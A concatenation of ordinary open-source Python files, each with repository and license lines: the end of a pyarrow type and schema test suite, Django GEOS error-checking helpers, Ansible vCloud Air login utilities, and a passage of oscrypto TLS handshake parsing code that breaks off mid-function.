('binary', pa.binary()), ('time32[s]', pa.time32('s')), ('time32[ms]', pa.time32('ms')), ('time64[us]', pa.time64('us')), ('time64[ns]', pa.time64('ns')), ('timestamp[s]', pa.timestamp('s')), ('timestamp[ms]', pa.timestamp('ms')), ('timestamp[us]', pa.timestamp('us')), ('timestamp[ns]', pa.timestamp('ns')), ('duration[s]', pa.duration('s')), ('duration[ms]', pa.duration('ms')), ('duration[us]', pa.duration('us')), ('duration[ns]', pa.duration('ns')), ] for val, expected in cases: assert pa.type_for_alias(val) == expected def test_type_string(): t = pa.string() assert str(t) == 'string' def test_type_timestamp_with_tz(): tz = 'America/Los_Angeles' t = pa.timestamp('ns', tz=tz) assert t.unit == 'ns' assert t.tz == tz def test_time_types(): t1 = pa.time32('s') t2 = pa.time32('ms') t3 = pa.time64('us') t4 = pa.time64('ns') assert t1.unit == 's' assert t2.unit == 'ms' assert t3.unit == 'us' assert t4.unit == 'ns' assert str(t1) == 'time32[s]' assert str(t4) == 'time64[ns]' with pytest.raises(ValueError): pa.time32('us') with pytest.raises(ValueError): pa.time64('s') def test_from_numpy_dtype(): cases = [ (np.dtype('bool'), pa.bool_()), (np.dtype('int8'), pa.int8()), (np.dtype('int16'), pa.int16()), (np.dtype('int32'), pa.int32()), (np.dtype('int64'), pa.int64()), (np.dtype('uint8'), pa.uint8()), (np.dtype('uint16'), pa.uint16()), (np.dtype('uint32'), pa.uint32()), (np.dtype('float16'), pa.float16()), (np.dtype('float32'), pa.float32()), (np.dtype('float64'), pa.float64()), (np.dtype('U'), pa.string()), (np.dtype('S'), pa.binary()), (np.dtype('datetime64[s]'), pa.timestamp('s')), (np.dtype('datetime64[ms]'), pa.timestamp('ms')), (np.dtype('datetime64[us]'), pa.timestamp('us')), (np.dtype('datetime64[ns]'), pa.timestamp('ns')), (np.dtype('timedelta64[s]'), pa.duration('s')), (np.dtype('timedelta64[ms]'), pa.duration('ms')), (np.dtype('timedelta64[us]'), pa.duration('us')), (np.dtype('timedelta64[ns]'), pa.duration('ns')), ] for dt, pt in cases: result = pa.from_numpy_dtype(dt) assert result == pt # Things convertible to numpy dtypes work assert pa.from_numpy_dtype('U') == pa.string() assert pa.from_numpy_dtype(np.str_) == pa.string() assert pa.from_numpy_dtype('int32') == pa.int32() assert pa.from_numpy_dtype(bool) == pa.bool_() with pytest.raises(NotImplementedError): pa.from_numpy_dtype(np.dtype('O')) with pytest.raises(TypeError): pa.from_numpy_dtype('not_convertible_to_dtype') def test_schema(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())) ] sch = pa.schema(fields) assert sch.names == ['foo', 'bar', 'baz'] assert sch.types == [pa.int32(), pa.string(), pa.list_(pa.int8())] assert len(sch) == 3 assert sch[0].name == 'foo' assert sch[0].type == fields[0].type assert sch.field('foo').name == 'foo' assert sch.field('foo').type == fields[0].type assert repr(sch) == """\ foo: int32 bar: string baz: list<item: int8> child 0, item: int8""" with pytest.raises(TypeError): pa.schema([None]) def test_schema_weakref(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())) ] schema = pa.schema(fields) wr = weakref.ref(schema) assert wr() is not None del schema assert wr() is None def test_schema_to_string_with_metadata(): lorem = """\ Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla accumsan vel turpis et mollis. Aliquam tincidunt arcu id tortor blandit blandit. Donec eget leo quis lectus scelerisque varius. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Praesent faucibus, diam eu volutpat iaculis, tellus est porta ligula, a efficitur turpis nulla facilisis quam. Aliquam vitae lorem erat. Proin a dolor ac libero dignissim mollis vitae eu mauris. Quisque posuere tellus vitae massa pellentesque sagittis. Aenean feugiat, diam ac dignissim fermentum, lorem sapien commodo massa, vel volutpat orci nisi eu justo. Nulla non blandit sapien. Quisque pretium vestibulum urna eu vehicula.""" # ARROW-7063 my_schema = pa.schema([pa.field("foo", "int32", False, metadata={"key1": "value1"}), pa.field("bar", "string", True, metadata={"key3": "value3"})], metadata={"lorem": lorem}) assert my_schema.to_string() == """\ foo: int32 not null -- field metadata -- key1: 'value1' bar: string -- field metadata -- key3: 'value3' -- schema metadata -- lorem: '""" + lorem[:65] + "' + " + str(len(lorem) - 65) # Metadata that exactly fits result = pa.schema([('f0', 'int32')], metadata={'key': 'value' + 'x' * 62}).to_string() assert result == """\ f0: int32 -- schema metadata -- key: 'valuexxxxxxxxxxxxxxxxxxxxxxxxxxxxx\ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'""" assert my_schema.to_string(truncate_metadata=False) == """\ foo: int32 not null -- field metadata -- key1: 'value1' bar: string -- field metadata -- key3: 'value3' -- schema metadata -- lorem: '{}'""".format(lorem) assert my_schema.to_string(truncate_metadata=False, show_field_metadata=False) == """\ foo: int32 not null bar: string -- schema metadata -- lorem: '{}'""".format(lorem) assert my_schema.to_string(truncate_metadata=False, show_schema_metadata=False) == """\ foo: int32 not null -- field metadata -- key1: 'value1' bar: string -- field metadata -- key3: 'value3'""" assert my_schema.to_string(truncate_metadata=False, show_field_metadata=False, show_schema_metadata=False) == """\ foo: int32 not null bar: string""" def test_schema_from_tuples(): fields = [ ('foo', pa.int32()), ('bar', pa.string()), ('baz', pa.list_(pa.int8())), ] sch = pa.schema(fields) assert sch.names == ['foo', 'bar', 'baz'] assert sch.types == [pa.int32(), pa.string(), pa.list_(pa.int8())] assert len(sch) == 3 assert repr(sch) == """\ foo: int32 bar: string baz: list<item: int8> child 0, item: int8""" with pytest.raises(TypeError): pa.schema([('foo', None)]) def test_schema_from_mapping(): fields = OrderedDict([ ('foo', pa.int32()), ('bar', pa.string()), ('baz', pa.list_(pa.int8())), ]) sch = pa.schema(fields) assert sch.names == ['foo', 'bar', 'baz'] assert sch.types == [pa.int32(), pa.string(), pa.list_(pa.int8())] assert len(sch) == 3 assert repr(sch) == """\ foo: int32 bar: string baz: list<item: int8> child 0, item: int8""" fields = OrderedDict([('foo', None)]) with pytest.raises(TypeError): pa.schema(fields) def test_schema_duplicate_fields(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('foo', pa.list_(pa.int8())), ] sch = pa.schema(fields) assert sch.names == ['foo', 'bar', 'foo'] assert sch.types == [pa.int32(), pa.string(), pa.list_(pa.int8())] assert len(sch) == 3 assert repr(sch) == """\ foo: int32 bar: string foo: list<item: int8> child 0, item: int8""" assert sch[0].name == 'foo' assert sch[0].type == fields[0].type with pytest.warns(FutureWarning): assert sch.field_by_name('bar') == fields[1] with pytest.warns(FutureWarning): assert sch.field_by_name('xxx') is None with pytest.warns((UserWarning, FutureWarning)): assert sch.field_by_name('foo') is None # Schema::GetFieldIndex assert sch.get_field_index('foo') == -1 # Schema::GetAllFieldIndices assert sch.get_all_field_indices('foo') == [0, 2] def test_field_flatten(): f0 = pa.field('foo', pa.int32()).with_metadata({b'foo': b'bar'}) assert f0.flatten() == [f0] f1 = pa.field('bar', pa.float64(), nullable=False) ff = pa.field('ff', pa.struct([f0, f1]), nullable=False) assert ff.flatten() == [ pa.field('ff.foo', pa.int32()).with_metadata({b'foo': b'bar'}), pa.field('ff.bar', pa.float64(), nullable=False)] # XXX # Nullable parent makes flattened child nullable ff = pa.field('ff', pa.struct([f0, f1])) assert ff.flatten() == [ pa.field('ff.foo', pa.int32()).with_metadata({b'foo': b'bar'}), pa.field('ff.bar', pa.float64())] fff = pa.field('fff', pa.struct([ff])) assert fff.flatten() == [pa.field('fff.ff', pa.struct([f0, f1]))] def test_schema_add_remove_metadata(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())) ] s1 = pa.schema(fields) assert s1.metadata is None metadata = {b'foo': b'bar', b'pandas': b'badger'} s2 = s1.with_metadata(metadata) assert s2.metadata == metadata s3 = s2.remove_metadata() assert s3.metadata is None # idempotent s4 = s3.remove_metadata() assert s4.metadata is None def test_schema_equals(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())) ] metadata = {b'foo': b'bar', b'pandas': b'badger'} sch1 = pa.schema(fields) sch2 = pa.schema(fields) sch3 = pa.schema(fields, metadata=metadata) sch4 = pa.schema(fields, metadata=metadata) assert sch1.equals(sch2, check_metadata=True) assert sch3.equals(sch4, check_metadata=True) assert sch1.equals(sch3) assert not sch1.equals(sch3, check_metadata=True) assert not sch1.equals(sch3, check_metadata=True) del fields[-1] sch3 = pa.schema(fields) assert not sch1.equals(sch3) def test_schema_equals_propagates_check_metadata(): # ARROW-4088 schema1 = pa.schema([ pa.field('foo', pa.int32()), pa.field('bar', pa.string()) ]) schema2 = pa.schema([ pa.field('foo', pa.int32()), pa.field('bar', pa.string(), metadata={'a': 'alpha'}), ]) assert not schema1.equals(schema2, check_metadata=True) assert schema1.equals(schema2) def test_schema_equals_invalid_type(): # ARROW-5873 schema = pa.schema([pa.field("a", pa.int64())]) for val in [None, 'string', pa.array([1, 2])]: with pytest.raises(TypeError): schema.equals(val) def test_schema_equality_operators(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())) ] metadata = {b'foo': b'bar', b'pandas': b'badger'} sch1 = pa.schema(fields) sch2 = pa.schema(fields) sch3 = pa.schema(fields, metadata=metadata) sch4 = pa.schema(fields, metadata=metadata) assert sch1 == sch2 assert sch3 == sch4 # __eq__ and __ne__ do not check metadata assert sch1 == sch3 assert not sch1 != sch3 assert sch2 == sch4 # comparison with other types doesn't raise assert sch1 != [] assert sch3 != 'foo' def test_schema_get_fields(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())) ] schema = pa.schema(fields) assert schema.field('foo').name == 'foo' assert schema.field(0).name == 'foo' assert schema.field(-1).name == 'baz' with pytest.raises(KeyError): schema.field('other') with pytest.raises(TypeError): schema.field(0.0) with pytest.raises(IndexError): schema.field(4) def test_schema_negative_indexing(): fields = [ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())) ] schema = pa.schema(fields) assert schema[-1].equals(schema[2]) assert schema[-2].equals(schema[1]) assert schema[-3].equals(schema[0]) with pytest.raises(IndexError): schema[-4] with pytest.raises(IndexError): schema[3] def test_schema_repr_with_dictionaries(): fields = [ pa.field('one', pa.dictionary(pa.int16(), pa.string())), pa.field('two', pa.int32()) ] sch = pa.schema(fields) expected = ( """\ one: dictionary<values=string, indices=int16, ordered=0> two: int32""") assert repr(sch) == expected def test_type_schema_pickling(): cases = [ pa.int8(), pa.string(), pa.binary(), pa.binary(10), pa.list_(pa.string()), pa.map_(pa.string(), pa.int8()), pa.struct([ pa.field('a', 'int8'), pa.field('b', 'string') ]), pa.union([ pa.field('a', pa.int8()), pa.field('b', pa.int16()) ], pa.lib.UnionMode_SPARSE), pa.union([ pa.field('a', pa.int8()), pa.field('b', pa.int16()) ], pa.lib.UnionMode_DENSE), pa.time32('s'), pa.time64('us'), pa.date32(), pa.date64(), pa.timestamp('ms'), pa.timestamp('ns'), pa.decimal128(12, 2), pa.decimal256(76, 38), pa.field('a', 'string', metadata={b'foo': b'bar'}) ] for val in cases: roundtripped = pickle.loads(pickle.dumps(val)) assert val == roundtripped fields = [] for i, f in enumerate(cases): if isinstance(f, pa.Field): fields.append(f) else: fields.append(pa.field('_f{}'.format(i), f)) schema = pa.schema(fields, metadata={b'foo': b'bar'}) roundtripped = pickle.loads(pickle.dumps(schema)) assert schema == roundtripped def test_empty_table(): schema1 = pa.schema([ pa.field('f0', pa.int64()), pa.field('f1', pa.dictionary(pa.int32(), pa.string())), pa.field('f2', pa.list_(pa.list_(pa.int64()))), ]) # test it preserves field nullability schema2 = pa.schema([ pa.field('a', pa.int64(), nullable=False), pa.field('b', pa.int64()) ]) for schema in [schema1, schema2]: table = schema.empty_table() assert isinstance(table, pa.Table) assert table.num_rows == 0 assert table.schema == schema @pytest.mark.pandas def test_schema_from_pandas(): import pandas as pd inputs = [ list(range(10)), pd.Categorical(list(range(10))), ['foo', 'bar', None, 'baz', 'qux'], np.array([ '2007-07-13T01:23:34.123456789', '2006-01-13T12:34:56.432539784', '2010-08-13T05:46:57.437699912' ], dtype='datetime64[ns]'), ] if Version(pd.__version__) >= Version('1.0.0'): inputs.append(pd.array([1, 2, None], dtype=pd.Int32Dtype())) for data in inputs: df = pd.DataFrame({'a': data}) schema = pa.Schema.from_pandas(df) expected = pa.Table.from_pandas(df).schema assert schema == expected def test_schema_sizeof(): schema = pa.schema([ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), ]) assert sys.getsizeof(schema) > 30 schema2 = schema.with_metadata({"key": "some metadata"}) assert sys.getsizeof(schema2) > sys.getsizeof(schema) schema3 = schema.with_metadata({"key": "some more metadata"}) assert sys.getsizeof(schema3) > sys.getsizeof(schema2) def test_schema_merge(): a = pa.schema([ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())) ]) b = pa.schema([ pa.field('foo', pa.int32()), pa.field('qux', pa.bool_()) ]) c = pa.schema([ pa.field('quux', pa.dictionary(pa.int32(), pa.string())) ]) d = pa.schema([ pa.field('foo', pa.int64()), pa.field('qux', pa.bool_()) ]) result = pa.unify_schemas([a, b, c]) expected = pa.schema([ pa.field('foo', pa.int32()), pa.field('bar', pa.string()), pa.field('baz', pa.list_(pa.int8())), pa.field('qux', pa.bool_()), pa.field('quux', pa.dictionary(pa.int32(), pa.string())) ]) assert result.equals(expected) with pytest.raises(pa.ArrowInvalid): pa.unify_schemas([b, d]) def test_undecodable_metadata(): # ARROW-10214: undecodable metadata shouldn't fail repr() data1 = b'abcdef\xff\x00' data2 = b'ghijkl\xff\x00' schema = pa.schema( [pa.field('ints', pa.int16(), metadata={'key': data1})], metadata={'key': data2}) assert 'abcdef' in str(schema) assert 'ghijkl' in str(schema)
apache-2.0
density215/d215-miniblog
django/contrib/gis/geos/prototypes/errcheck.py
623
3522
""" Error checking functions for GEOS ctypes prototype functions. """ import os from ctypes import c_void_p, string_at, CDLL from django.contrib.gis.geos.error import GEOSException from django.contrib.gis.geos.libgeos import GEOS_VERSION from django.contrib.gis.geos.prototypes.threadsafe import GEOSFunc # Getting the `free` routine used to free the memory allocated for # string pointers returned by GEOS. if GEOS_VERSION >= (3, 1, 1): # In versions 3.1.1 and above, `GEOSFree` was added to the C API # because `free` isn't always available on all platforms. free = GEOSFunc('GEOSFree') free.argtypes = [c_void_p] free.restype = None else: # Getting the `free` routine from the C library of the platform. if os.name == 'nt': # On NT, use the MS C library. libc = CDLL('msvcrt') else: # On POSIX platforms C library is obtained by passing None into `CDLL`. libc = CDLL(None) free = libc.free ### ctypes error checking routines ### def last_arg_byref(args): "Returns the last C argument's value by reference." return args[-1]._obj.value def check_dbl(result, func, cargs): "Checks the status code and returns the double value passed in by reference." # Checking the status code if result != 1: return None # Double passed in by reference, return its value. return last_arg_byref(cargs) def check_geom(result, func, cargs): "Error checking on routines that return Geometries." if not result: raise GEOSException('Error encountered checking Geometry returned from GEOS C function "%s".' % func.__name__) return result def check_minus_one(result, func, cargs): "Error checking on routines that should not return -1." if result == -1: raise GEOSException('Error encountered in GEOS C function "%s".' % func.__name__) else: return result def check_predicate(result, func, cargs): "Error checking for unary/binary predicate functions." val = ord(result) # getting the ordinal from the character if val == 1: return True elif val == 0: return False else: raise GEOSException('Error encountered on GEOS C predicate function "%s".' % func.__name__) def check_sized_string(result, func, cargs): """ Error checking for routines that return explicitly sized strings. This frees the memory allocated by GEOS at the result pointer. """ if not result: raise GEOSException('Invalid string pointer returned by GEOS C function "%s"' % func.__name__) # A c_size_t object is passed in by reference for the second # argument on these routines, and its needed to determine the # correct size. s = string_at(result, last_arg_byref(cargs)) # Freeing the memory allocated within GEOS free(result) return s def check_string(result, func, cargs): """ Error checking for routines that return strings. This frees the memory allocated by GEOS at the result pointer. """ if not result: raise GEOSException('Error encountered checking string return value in GEOS C function "%s".' % func.__name__) # Getting the string value at the pointer address. s = string_at(result) # Freeing the memory allocated within GEOS free(result) return s def check_zero(result, func, cargs): "Error checking on routines that should not return 0." if result == 0: raise GEOSException('Error encountered in GEOS C function "%s".' % func.__name__) else: return result
bsd-3-clause
mensler/ansible
lib/ansible/module_utils/vca.py
77
11149
# # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. import os try: from pyvcloud.vcloudair import VCA HAS_PYVCLOUD = True except ImportError: HAS_PYVCLOUD = False from ansible.module_utils.basic import AnsibleModule SERVICE_MAP = {'vca': 'ondemand', 'vchs': 'subscription', 'vcd': 'vcd'} LOGIN_HOST = {'vca': 'vca.vmware.com', 'vchs': 'vchs.vmware.com'} DEFAULT_SERVICE_TYPE = 'vca' DEFAULT_VERSION = '5.7' class VcaError(Exception): def __init__(self, msg, **kwargs): self.kwargs = kwargs super(VcaError, self).__init__(msg) def vca_argument_spec(): return dict( username=dict(type='str', aliases=['user'], required=True), password=dict(type='str', aliases=['pass','passwd'], required=True, no_log=True), org=dict(), service_id=dict(), instance_id=dict(), host=dict(), api_version=dict(default=DEFAULT_VERSION), service_type=dict(default=DEFAULT_SERVICE_TYPE, choices=SERVICE_MAP.keys()), vdc_name=dict(), gateway_name=dict(default='gateway'), verify_certs=dict(type='bool', default=True) ) class VcaAnsibleModule(AnsibleModule): def __init__(self, *args, **kwargs): argument_spec = vca_argument_spec() argument_spec.update(kwargs.get('argument_spec', dict())) kwargs['argument_spec'] = argument_spec super(VcaAnsibleModule, self).__init__(*args, **kwargs) if not HAS_PYVCLOUD: self.fail("python module pyvcloud is required for this module") self._vca = self.create_instance() self.login() self._gateway = None self._vdc = None @property def vca(self): return self._vca @property def gateway(self): if self._gateway is not None: return self._gateway vdc_name = self.params['vdc_name'] gateway_name = self.params['gateway_name'] _gateway = self.vca.get_gateway(vdc_name, gateway_name) if not _gateway: raise VcaError('vca instance has no gateway named %s' % gateway_name) self._gateway = _gateway return _gateway @property def vdc(self): if self._vdc is not None: return self._vdc vdc_name = self.params['vdc_name'] _vdc = self.vca.get_vdc(vdc_name) if not _vdc: raise VcaError('vca instance has no vdc named %s' % vdc_name) self._vdc = _vdc return _vdc def get_vapp(self, vapp_name): vapp = self.vca.get_vapp(self.vdc, vapp_name) if not vapp: raise VcaError('vca instance has no vapp named %s' % vapp_name) return vapp def get_vm(self, vapp_name, vm_name): vapp = self.get_vapp(vapp_name) children = vapp.me.get_Children() vms = [vm for vm in children.get_Vm() if vm.name == vm_name] try: return vms[0] except IndexError: raise VcaError('vapp has no vm named %s' % vm_name) def create_instance(self): service_type = self.params.get('service_type', DEFAULT_SERVICE_TYPE) if service_type == 'vcd': host = self.params['host'] else: host = LOGIN_HOST[service_type] username = self.params['username'] version = self.params.get('api_version') if service_type == 'vchs': version = '5.6' verify = self.params.get('verify_certs') return VCA(host=host, username=username, service_type=SERVICE_MAP[service_type], version=version, verify=verify) def login(self): service_type = self.params['service_type'] password = self.params['password'] login_org = None if service_type == 'vcd': login_org = self.params['org'] if not self.vca.login(password=password, org=login_org): self.fail('Login to VCA failed', response=self.vca.response) try: method_name = 'login_%s' % service_type meth = getattr(self, method_name) meth() except AttributeError: self.fail('no login method exists for service_type %s' % service_type) except VcaError as e: self.fail(e.message, response=self.vca.response, **e.kwargs) def login_vca(self): instance_id = self.params['instance_id'] if not instance_id: raise VcaError('missing required instance_id for service_type vca') self.vca.login_to_instance_sso(instance=instance_id) def login_vchs(self): service_id = self.params['service_id'] if not service_id: raise VcaError('missing required service_id for service_type vchs') org = self.params['org'] if not org: raise VcaError('missing required org for service_type vchs') self.vca.login_to_org(service_id, org) def login_vcd(self): org = self.params['org'] if not org: raise VcaError('missing required org for service_type vcd') if not self.vca.token: raise VcaError('unable to get token for service_type vcd') if not self.vca.vcloud_session.org_url: raise VcaError('unable to get org_url for service_type vcd') self.vca.login(token=self.vca.token, org=org, org_url=self.vca.vcloud_session.org_url) def save_services_config(self, blocking=True): task = self.gateway.save_services_configuration() if not task: self.fail(msg='unable to save gateway services configuration') if blocking: self.vca.block_until_completed(task) def fail(self, msg, **kwargs): self.fail_json(msg=msg, **kwargs) def exit(self, **kwargs): self.exit_json(**kwargs) # ------------------------------------------------------------- # 9/18/2015 @privateip # All of the functions below here were migrated from the original # vca_* modules. All functions below should be considered deprecated # and will be removed once all of the vca_* modules have been updated # to use the new instance module above # ------------------------------------------------------------- VCA_REQ_ARGS = ['instance_id', 'vdc_name'] VCHS_REQ_ARGS = ['service_id'] VCD_REQ_ARGS = [] def _validate_module(module): if not HAS_PYVCLOUD: module.fail_json(msg="python module pyvcloud is needed for this module") service_type = module.params.get('service_type', DEFAULT_SERVICE_TYPE) if service_type == 'vca': for arg in VCA_REQ_ARGS: if module.params.get(arg) is None: module.fail_json(msg="argument %s is mandatory when service type " "is vca" % arg) if service_type == 'vchs': for arg in VCHS_REQ_ARGS: if module.params.get(arg) is None: module.fail_json(msg="argument %s is mandatory when service type " "is vchs" % arg) if service_type == 'vcd': for arg in VCD_REQ_ARGS: if module.params.get(arg) is None: module.fail_json(msg="argument %s is mandatory when service type " "is vcd" % arg) def serialize_instances(instance_list): instances = [] for i in instance_list: instances.append(dict(apiUrl=i['apiUrl'], instance_id=i['id'])) return instances def _vca_login(vca, password, instance): if not vca.login(password=password): raise VcaError("Login Failed: Please check username or password", error=vca.response.content) if not vca.login_to_instance_sso(instance=instance): s_json = serialize_instances(vca.instances) raise VcaError("Login to Instance failed: Seems like instance_id provided " "is wrong .. Please check", valid_instances=s_json) return vca def _vchs_login(vca, password, service, org): if not vca.login(password=password): raise VcaError("Login Failed: Please check username or password", error=vca.response.content) if not vca.login_to_org(service, org): raise VcaError("Failed to login to org, Please check the orgname", error=vca.response.content) def _vcd_login(vca, password, org): # TODO: this function needs to be refactored if not vca.login(password=password, org=org): raise VcaError("Login Failed: Please check username or password " "or host parameters") if not vca.login(password=password, org=org): raise VcaError("Failed to get the token", error=vca.response.content) if not vca.login(token=vca.token, org=org, org_url=vca.vcloud_session.org_url): raise VcaError("Failed to login to org", error=vca.response.content) def vca_login(module): service_type = module.params.get('service_type') username = module.params.get('username') password = module.params.get('password') instance = module.params.get('instance_id') org = module.params.get('org') vdc_name = module.params.get('vdc_name') service = module.params.get('service_id') version = module.params.get('api_version') verify = module.params.get('verify_certs') _validate_module(module) if not vdc_name and service_type == 'vchs': vdc_name = module.params.get('service_id') if not org and service_type == 'vchs': org = vdc_name or service if service_type == 'vcd': host = module.params.get('host') else: host = LOGIN_HOST[service_type] username = os.environ.get('VCA_USER', username) password = os.environ.get('VCA_PASS', password) if not username or not password: msg = "Either the username or password is not set, please check args" module.fail_json(msg=msg) if service_type == 'vchs': version = '5.6' elif service_type == 'vcd' and not version: version == '5.6' vca = VCA(host=host, username=username, service_type=SERVICE_MAP[service_type], version=version, verify=verify) try: if service_type == 'vca': _vca_login(vca, password, instance) elif service_type == 'vchs': _vchs_login(vca, password, service, org) elif service_type == 'vcd': _vcd_login(vca, password, org) except VcaError as e: module.fail_json(msg=e.message, **e.kwargs) return vca
gpl-3.0
igor-rangel7l/novoigorrangel.repository
plugin.video.SportsDevil/service/oscrypto/_tls.py
7
16431
# coding: utf-8 from __future__ import unicode_literals, division, absolute_import, print_function import re from datetime import datetime from asn1crypto.util import int_from_bytes, timezone from asn1crypto.x509 import Certificate from ._cipher_suites import CIPHER_SUITE_MAP from .errors import TLSVerificationError, TLSError __all__ = [ 'detect_client_auth_request', 'extract_chain', 'get_dh_params_length', 'parse_session_info', 'raise_client_auth', 'raise_dh_params', 'raise_disconnection', 'raise_expired_not_yet_valid', 'raise_handshake', 'raise_hostname', 'raise_no_issuer', 'raise_protocol_error', 'raise_revoked', 'raise_self_signed', 'raise_verification', 'raise_weak_signature', ] def extract_chain(server_handshake_bytes): """ Extracts the X.509 certificates from the server handshake bytes for use when debugging :param server_handshake_bytes: A byte string of the handshake data received from the server :return: A list of asn1crypto.x509.Certificate objects """ output = [] chain_bytes = None for record_type, _, record_data in _parse_tls_records(server_handshake_bytes): if record_type != b'\x16': continue for message_type, message_data in _parse_handshake_messages(record_data): if message_type == b'\x0b': chain_bytes = message_data break if chain_bytes: break if chain_bytes: # The first 3 bytes are the cert chain length pointer = 3 while pointer < len(chain_bytes): cert_length = int_from_bytes(chain_bytes[pointer:pointer + 3]) cert_start = pointer + 3 cert_end = cert_start + cert_length pointer = cert_end cert_bytes = chain_bytes[cert_start:cert_end] output.append(Certificate.load(cert_bytes)) return output def detect_client_auth_request(server_handshake_bytes): """ Determines if a CertificateRequest message is sent from the server asking the client for a certificate :param server_handshake_bytes: A byte string of the handshake data received from the server :return: A boolean - if a client certificate request was found """ for record_type, _, record_data in _parse_tls_records(server_handshake_bytes): if record_type != b'\x16': continue for message_type, message_data in _parse_handshake_messages(record_data): if message_type == b'\x0d': return True return False def get_dh_params_length(server_handshake_bytes): """ Determines the length of the DH params from the ServerKeyExchange :param server_handshake_bytes: A byte string of the handshake data received from the server :return: None or an integer of the bit size of the DH parameters """ output = None dh_params_bytes = None for record_type, _, record_data in _parse_tls_records(server_handshake_bytes): if record_type != b'\x16': continue for message_type, message_data in _parse_handshake_messages(record_data): if message_type == b'\x0c': dh_params_bytes = message_data break if dh_params_bytes: break if dh_params_bytes: output = int_from_bytes(dh_params_bytes[0:2]) * 8 return output def parse_session_info(server_handshake_bytes, client_handshake_bytes): """ Parse the TLS handshake from the client to the server to extract information including the cipher suite selected, if compression is enabled, the session id and if a new or reused session ticket exists. :param server_handshake_bytes: A byte string of the handshake data received from the server :param client_handshake_bytes: A byte string of the handshake data sent to the server :return: A dict with the following keys: - "protocol": unicode string - "cipher_suite": unicode string - "compression": boolean - "session_id": "new", "reused" or None - "session_ticket: "new", "reused" or None """ protocol = None cipher_suite = None compression = False session_id = None session_ticket = None server_session_id = None client_session_id = None for record_type, _, record_data in _parse_tls_records(server_handshake_bytes): if record_type != b'\x16': continue for message_type, message_data in _parse_handshake_messages(record_data): # Ensure we are working with a ServerHello message if message_type != b'\x02': continue protocol = { b'\x03\x00': "SSLv3", b'\x03\x01': "TLSv1", b'\x03\x02': "TLSv1.1", b'\x03\x03': "TLSv1.2", b'\x03\x04': "TLSv1.3", }[message_data[0:2]] session_id_length = int_from_bytes(message_data[34:35]) if session_id_length > 0: server_session_id = message_data[35:35 + session_id_length] cipher_suite_start = 35 + session_id_length cipher_suite_bytes = message_data[cipher_suite_start:cipher_suite_start + 2] cipher_suite = CIPHER_SUITE_MAP[cipher_suite_bytes] compression_start = cipher_suite_start + 2 compression = message_data[compression_start:compression_start + 1] != b'\x00' extensions_length_start = compression_start + 1 extensions_data = message_data[extensions_length_start:] for extension_type, extension_data in _parse_hello_extensions(extensions_data): if extension_type == 35: session_ticket = "new" break break for record_type, _, record_data in _parse_tls_records(client_handshake_bytes): if record_type != b'\x16': continue for message_type, message_data in _parse_handshake_messages(record_data): # Ensure we are working with a ClientHello message if message_type != b'\x01': continue session_id_length = int_from_bytes(message_data[34:35]) if session_id_length > 0: client_session_id = message_data[35:35 + session_id_length] cipher_suite_start = 35 + session_id_length cipher_suite_length = int_from_bytes(message_data[cipher_suite_start:cipher_suite_start + 2]) compression_start = cipher_suite_start + 2 + cipher_suite_length compression_length = int_from_bytes(message_data[compression_start:compression_start + 1]) # On subsequent requests, the session ticket will only be seen # in the ClientHello message if server_session_id is None and session_ticket is None: extensions_length_start = compression_start + 1 + compression_length extensions_data = message_data[extensions_length_start:] for extension_type, extension_data in _parse_hello_extensions(extensions_data): if extension_type == 35: session_ticket = "reused" break break if server_session_id is not None: if client_session_id is None: session_id = "new" else: if client_session_id != server_session_id: session_id = "new" else: session_id = "reused" return { "protocol": protocol, "cipher_suite": cipher_suite, "compression": compression, "session_id": session_id, "session_ticket": session_ticket, } def _parse_tls_records(data): """ Creates a generator returning tuples of information about each record in a byte string of data from a TLS client or server. Stops as soon as it find a ChangeCipherSpec message since all data from then on is encrypted. :param data: A byte string of TLS records :return: A generator that yields 3-element tuples: [0] Byte string of record type [1] Byte string of protocol version [2] Byte string of record data """ pointer = 0 data_len = len(data) while pointer < data_len: # Don't try to parse any more once the ChangeCipherSpec is found if data[pointer:pointer + 1] == b'\x14': break length = int_from_bytes(data[pointer + 3:pointer + 5]) yield ( data[pointer:pointer + 1], data[pointer + 1:pointer + 3], data[pointer + 5:pointer + 5 + length] ) pointer += 5 + length def _parse_handshake_messages(data): """ Creates a generator returning tuples of information about each message in a byte string of data from a TLS handshake record :param data: A byte string of a TLS handshake record data :return: A generator that yields 2-element tuples: [0] Byte string of message type [1] Byte string of message data """ pointer = 0 data_len = len(data) while pointer < data_len: length = int_from_bytes(data[pointer + 1:pointer + 4]) yield ( data[pointer:pointer + 1], data[pointer + 4:pointer + 4 + length] ) pointer += 4 + length def _parse_hello_extensions(data): """ Creates a generator returning tuples of information about each extension from a byte string of extension data contained in a ServerHello ores ClientHello message :param data: A byte string of a extension data from a TLS ServerHello or ClientHello message :return: A generator that yields 2-element tuples: [0] Byte string of extension type [1] Byte string of extension data """ if data == b'': return extentions_length = int_from_bytes(data[0:2]) extensions_start = 2 extensions_end = 2 + extentions_length pointer = extensions_start while pointer < extensions_end: extension_type = 